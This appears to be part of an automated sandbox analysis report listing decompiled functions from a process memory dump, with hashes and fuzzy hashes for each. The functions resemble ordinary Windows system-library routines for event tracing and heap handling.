                                                                          0x012410c3
                                                                          0x012410cf
                                                                          0x012410e1
                                                                          0x012410d1
                                                                          0x012410da
                                                                          0x012410da
                                                                          0x012410e9
                                                                          0x012410f5
                                                                          0x012410f5
                                                                          0x012410fe

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 089e7b0592a36f7dd594ebc92eb7cc11b9e83c5322693ada0268935c1aae8482
                                                                          • Instruction ID: 813671f08e08d6595529b3b5cffb3fdaf01a91b729d756a2ecf788264a11f7b7
                                                                          • Opcode Fuzzy Hash: 089e7b0592a36f7dd594ebc92eb7cc11b9e83c5322693ada0268935c1aae8482
                                                                          • Instruction Fuzzy Hash: E6014C726247429FC715DF68C904B2A7BE5BBD4314F04C529FD85832D0EE70E890CB92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0122FE3F, Relevance: .0, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 59%
                                                                          			E0122FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x126d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E011BFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E01197D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E011BB640(E011B9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                          0x0122fe3f
                                                                          0x0122fe3f
                                                                          0x0122fe4e
                                                                          0x0122fe58
                                                                          0x0122fe5d
                                                                          0x0122fe5f
                                                                          0x0122fe6a
                                                                          0x0122fe72
                                                                          0x0122fe75
                                                                          0x0122fe78
                                                                          0x0122fe83
                                                                          0x0122fe95
                                                                          0x0122fe85
                                                                          0x0122fe8e
                                                                          0x0122fe8e
                                                                          0x0122fea0
                                                                          0x0122fea1
                                                                          0x0122fea3
                                                                          0x0122fea8
                                                                          0x0122febd

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e5cd02f324f6f6e0c2c1e90328941ad40b0ed19b84b2fce79151d14a26f4a973
                                                                          • Instruction ID: d4afea023372ac592821e90af7f57f59dbef1cc464e85bafdf57e218afdcc48d
                                                                          • Opcode Fuzzy Hash: e5cd02f324f6f6e0c2c1e90328941ad40b0ed19b84b2fce79151d14a26f4a973
                                                                          • Instruction Fuzzy Hash: E9018471E1025DAFDB18DFA9D845FAEBBB8EF44704F004066F900AB391DA749901CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0122FEC0, Relevance: .0, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 59%
                                                                          			E0122FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x126d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E011BFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E01197D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E011BB640(E011B9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                          0x0122fec0
                                                                          0x0122fec0
                                                                          0x0122fecf
                                                                          0x0122fed9
                                                                          0x0122fede
                                                                          0x0122fee0
                                                                          0x0122feeb
                                                                          0x0122fef3
                                                                          0x0122fef6
                                                                          0x0122fef9
                                                                          0x0122ff04
                                                                          0x0122ff16
                                                                          0x0122ff06
                                                                          0x0122ff0f
                                                                          0x0122ff0f
                                                                          0x0122ff21
                                                                          0x0122ff22
                                                                          0x0122ff24
                                                                          0x0122ff29
                                                                          0x0122ff3e

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 969ec94e0686c3248c7c60c7e61f56f795803af1782474cac296ad657effe332
                                                                          • Instruction ID: 4931f436797e3d24f2b9432486be5b8bcf570eefac1eb5ff50e63dea8b565efa
                                                                          • Opcode Fuzzy Hash: 969ec94e0686c3248c7c60c7e61f56f795803af1782474cac296ad657effe332
                                                                          • Instruction Fuzzy Hash: BC018471E1021DAFDB18DBA9D845FAFBBB8EF45704F004066FA00AB290DA749A01CBD4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01248A62, Relevance: .0, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 54%
                                                                          			E01248A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x126d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E01197D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E011BB640(E011B9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                          0x01248a62
                                                                          0x01248a71
                                                                          0x01248a79
                                                                          0x01248a82
                                                                          0x01248a85
                                                                          0x01248a89
                                                                          0x01248a8c
                                                                          0x01248a8f
                                                                          0x01248a92
                                                                          0x01248a95
                                                                          0x01248a9f
                                                                          0x01248ab1
                                                                          0x01248aa1
                                                                          0x01248aaa
                                                                          0x01248aaa
                                                                          0x01248abc
                                                                          0x01248abd
                                                                          0x01248abf
                                                                          0x01248ac4
                                                                          0x01248ada

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 65b6895f45488fc2d57caf95440634ae951e80cd114e13ae4df6bc984d9f1e23
                                                                          • Instruction ID: ffa3d54cd36727ddd648e15c52258f89c41b2857996248788430dde56e6c73f8
                                                                          • Opcode Fuzzy Hash: 65b6895f45488fc2d57caf95440634ae951e80cd114e13ae4df6bc984d9f1e23
                                                                          • Instruction Fuzzy Hash: E9012CB1A1021DAFCB04DFA9D9859EEBBB8EF59314F10405AFA04F7391D774A901CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01248ED6, Relevance: .0, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 54%
                                                                          			E01248ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x126d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E01197D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E011BB640(E011B9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                                          0x01248ed6
                                                                          0x01248ee5
                                                                          0x01248eed
                                                                          0x01248ef0
                                                                          0x01248efa
                                                                          0x01248f03
                                                                          0x01248f0c
                                                                          0x01248f15
                                                                          0x01248f24
                                                                          0x01248f27
                                                                          0x01248f31
                                                                          0x01248f43
                                                                          0x01248f33
                                                                          0x01248f3c
                                                                          0x01248f3c
                                                                          0x01248f4e
                                                                          0x01248f4f
                                                                          0x01248f51
                                                                          0x01248f56
                                                                          0x01248f69

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: de6198e376e9617e1471da85d968b28ecee3d04481ad6c30b63912778fd34f09
                                                                          • Instruction ID: cc1bd6b88c1723a74a43468b2d2db3b224071a08bb511e91ab6db9c4f671f118
                                                                          • Opcode Fuzzy Hash: de6198e376e9617e1471da85d968b28ecee3d04481ad6c30b63912778fd34f09
                                                                          • Instruction Fuzzy Hash: 92111E70E1024A9FDB08DFA9D441BAEBBF4FF18704F5442AAE518EB781E7349940CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0117DB60, Relevance: .0, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0117DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0117DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0117E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0117E8B0(__ecx, _t14, 0xfff);
							L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                                          0x0117db64
                                                                          0x0117db66
                                                                          0x0117db6b
                                                                          0x0117dbaa
                                                                          0x0117db71
                                                                          0x0117db76
                                                                          0x0117db7a
                                                                          0x0117dba3
                                                                          0x0117db7c
                                                                          0x0117db87
                                                                          0x0117db8b
                                                                          0x011d4fa1
                                                                          0x011d4fb3
                                                                          0x011d4fb8
                                                                          0x0117db91
                                                                          0x0117db96
                                                                          0x0117db98
                                                                          0x0117db98
                                                                          0x0117db8b
                                                                          0x0117db7a
                                                                          0x0117db9d
                                                                          0x0117dba2

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                          • Instruction ID: 85b2b2e39d1e8a5ace2f696c27cab7355907db04531446b56835913bba667850
                                                                          • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                          • Instruction Fuzzy Hash: 12F0C8332015279BDB3E5AD95884F7BBAB58FD3A65F160035F2059B744CB60880286D2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0117B1E1, Relevance: .0, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0117B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E01197D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E01197D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E011F7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                                          0x0117b1e8
                                                                          0x0117b1ea
                                                                          0x0117b1f3
                                                                          0x011d4a17
                                                                          0x0117b1f9
                                                                          0x0117b1f9
                                                                          0x0117b1f9
                                                                          0x0117b201
                                                                          0x011d4a21
                                                                          0x011d4a2e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d4a3b
                                                                          0x011d4a4d
                                                                          0x011d4a3d
                                                                          0x011d4a46
                                                                          0x011d4a46
                                                                          0x011d4a55
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0117b20a
                                                                          0x0117b20a
                                                                          0x0117b20a
                                                                          0x0117b20a

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                          • Instruction ID: cbc0acfdb2e22cc1e383ce095545d57ab77704b48203ee4eda949c95fde7940a
                                                                          • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                          • Instruction Fuzzy Hash: 250144322056809FD32E931DC804F697BE9EF52354F0900A1FA158BBB2D778D800C31A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0120FE87, Relevance: .0, Instructions: 38COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 46%
                                                                          			E0120FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x126d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E01197D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E011BB640(E011B9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                                          0x0120fe96
                                                                          0x0120fe9e
                                                                          0x0120fea1
                                                                          0x0120fead
                                                                          0x0120feb3
                                                                          0x0120feb9
                                                                          0x0120fec3
                                                                          0x0120fed5
                                                                          0x0120fec5
                                                                          0x0120fece
                                                                          0x0120fece
                                                                          0x0120fee0
                                                                          0x0120fee1
                                                                          0x0120fee3
                                                                          0x0120fee8
                                                                          0x0120fefb

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0079f78d7ce99fa7e0d65a11c87b77c1df268719dc84253425a319c07e1b8beb
                                                                          • Instruction ID: c78cd03a6dc38ebfda0e07a77ad578348511d1d09eaea7924e034dd67f071028
                                                                          • Opcode Fuzzy Hash: 0079f78d7ce99fa7e0d65a11c87b77c1df268719dc84253425a319c07e1b8beb
                                                                          • Instruction Fuzzy Hash: B5016271A1020DAFCB14DFA8D546A6EB7F4EF04704F144169E514EB382D635DD01CB80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0123131B, Relevance: .0, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 48%
                                                                          			E0123131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x126d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E01197D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E011BB640(E011B9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                          0x0123131b
                                                                          0x0123132a
                                                                          0x01231330
                                                                          0x01231336
                                                                          0x0123133e
                                                                          0x01231341
                                                                          0x01231344
                                                                          0x0123134f
                                                                          0x01231361
                                                                          0x01231351
                                                                          0x0123135a
                                                                          0x0123135a
                                                                          0x0123136c
                                                                          0x0123136d
                                                                          0x0123136f
                                                                          0x01231374
                                                                          0x01231387

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 27913d2f0736f293ca4fecc927716e9895b8a3384a3fcd9282041d144e402ac9
                                                                          • Instruction ID: c5b0eb17bff3b879c795613939331aceb335cdcc87259ca26a8a10301c1bd3f8
                                                                          • Opcode Fuzzy Hash: 27913d2f0736f293ca4fecc927716e9895b8a3384a3fcd9282041d144e402ac9
                                                                          • Instruction Fuzzy Hash: CD018CB1A0020DAFCB04EFA9D545AAEB7F4FF48300F108059F945EB381E6349A10CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01248F6A, Relevance: .0, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 48%
                                                                          			E01248F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x126d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E01197D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E011BB640(E011B9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                          0x01248f6a
                                                                          0x01248f79
                                                                          0x01248f81
                                                                          0x01248f84
                                                                          0x01248f8b
                                                                          0x01248f91
                                                                          0x01248f94
                                                                          0x01248f9e
                                                                          0x01248fb0
                                                                          0x01248fa0
                                                                          0x01248fa9
                                                                          0x01248fa9
                                                                          0x01248fbb
                                                                          0x01248fbc
                                                                          0x01248fbe
                                                                          0x01248fc3
                                                                          0x01248fd6

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b35cae5aabc0ab82ad6149b04f98ef47e888f43ae673d8a27b63279a6997d5de
                                                                          • Instruction ID: 1be9c139461cff50f81538a44f3af17c2d373ab3de2c62af539344ee9da5fd4a
                                                                          • Opcode Fuzzy Hash: b35cae5aabc0ab82ad6149b04f98ef47e888f43ae673d8a27b63279a6997d5de
                                                                          • Instruction Fuzzy Hash: 1A013C74A1020DAFDB04EFA8D545AAEB7F4EF18304F508059FA05EB380EB74EA00CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0119C577, Relevance: .0, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0119C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0119C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x11511cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E012488F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                                          0x0119c577
                                                                          0x0119c57d
                                                                          0x0119c581
                                                                          0x0119c5b5
                                                                          0x0119c5b9
                                                                          0x0119c5ce
                                                                          0x0119c5ce
                                                                          0x0119c5ca
                                                                          0x00000000
                                                                          0x0119c5ca
                                                                          0x0119c5c4
                                                                          0x0119c5c8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0119c5ad
                                                                          0x00000000
                                                                          0x0119c5af

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5bf644feb9c71562ca1f0c3a87bf3dcf4c50c365f7e5839c5f726074ff2e6e5a
                                                                          • Instruction ID: 2d8d55e334b7efd70a2506e10b5497cc94e4131f68d1d76bb40507539d485561
                                                                          • Opcode Fuzzy Hash: 5bf644feb9c71562ca1f0c3a87bf3dcf4c50c365f7e5839c5f726074ff2e6e5a
                                                                          • Instruction Fuzzy Hash: E1F0FAF2B212909FFF3E832CC004B227FE89B04270F4589A6D5B683202C3A0C880CAC1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01248D34, Relevance: .0, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 43%
                                                                          			E01248D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x126d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E01197D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E011BB640(E011B9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                          0x01248d34
                                                                          0x01248d43
                                                                          0x01248d4b
                                                                          0x01248d4e
                                                                          0x01248d52
                                                                          0x01248d5c
                                                                          0x01248d6e
                                                                          0x01248d5e
                                                                          0x01248d67
                                                                          0x01248d67
                                                                          0x01248d79
                                                                          0x01248d7a
                                                                          0x01248d7c
                                                                          0x01248d81
                                                                          0x01248d94

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 01f34e3bbad91fc778c204f61b9f6ca0a1a547ba1fed9d13167d2f59cbe4dc53
                                                                          • Instruction ID: 595d017e4f714caebc75acc926966128bac814cd52e4dfde2f3c5acef715411f
                                                                          • Opcode Fuzzy Hash: 01f34e3bbad91fc778c204f61b9f6ca0a1a547ba1fed9d13167d2f59cbe4dc53
                                                                          • Instruction Fuzzy Hash: 2DF0B470E1460D9FDB18EFB8D445AAE77B4EF14704F108099E905EB290DA34D900CB54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01232073, Relevance: .0, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 94%
                                                                          			E01232073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0122FD22(__ecx);
				_t19 =  *0x126849c - _t3; // 0x797b44cf
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1268748; // 0x0
					if(__eflags <= 0) {
						E01231C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1268724 & 0x00000004;
							if(( *0x1268724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1268724; // 0x0
					return E01228DF1(__ebx, 0xc0000374, 0x1265890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                                          0x01232076
                                                                          0x01232078
                                                                          0x0123207d
                                                                          0x01232083
                                                                          0x012320a4
                                                                          0x012320aa
                                                                          0x012320ac
                                                                          0x012320b7
                                                                          0x012320ba
                                                                          0x012320bc
                                                                          0x012320c9
                                                                          0x012320c9
                                                                          0x012320d0
                                                                          0x012320d2
                                                                          0x00000000
                                                                          0x012320d2
                                                                          0x012320be
                                                                          0x012320c3
                                                                          0x012320c5
                                                                          0x012320c7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x012320c7
                                                                          0x012320bc
                                                                          0x012320d4
                                                                          0x01232085
                                                                          0x01232085
                                                                          0x012320a3
                                                                          0x012320a3

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b5d6300cbd41bdc49114ae6a6dadac71f76b3f0ae788e1ba3f01368d4aea2d14
                                                                          • Instruction ID: e9744278e9e5078b95fb1a8deacf551916733062e92bfbf7230abd757ddcd420
                                                                          • Opcode Fuzzy Hash: b5d6300cbd41bdc49114ae6a6dadac71f76b3f0ae788e1ba3f01368d4aea2d14
                                                                          • Instruction Fuzzy Hash: 89F055AA8312968ADF376B3C31183E1BFD2D7F5110F094486D6901724AC839889BCB21
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B927A, Relevance: .0, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 54%
                                                                          			E011B927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L01194620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E011BFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E011B92C6(_t11, _t14);
				}
				return _t11;
			}





                                                                          0x011b9295
                                                                          0x011b9299
                                                                          0x011b929f
                                                                          0x011b92aa
                                                                          0x011b92ad
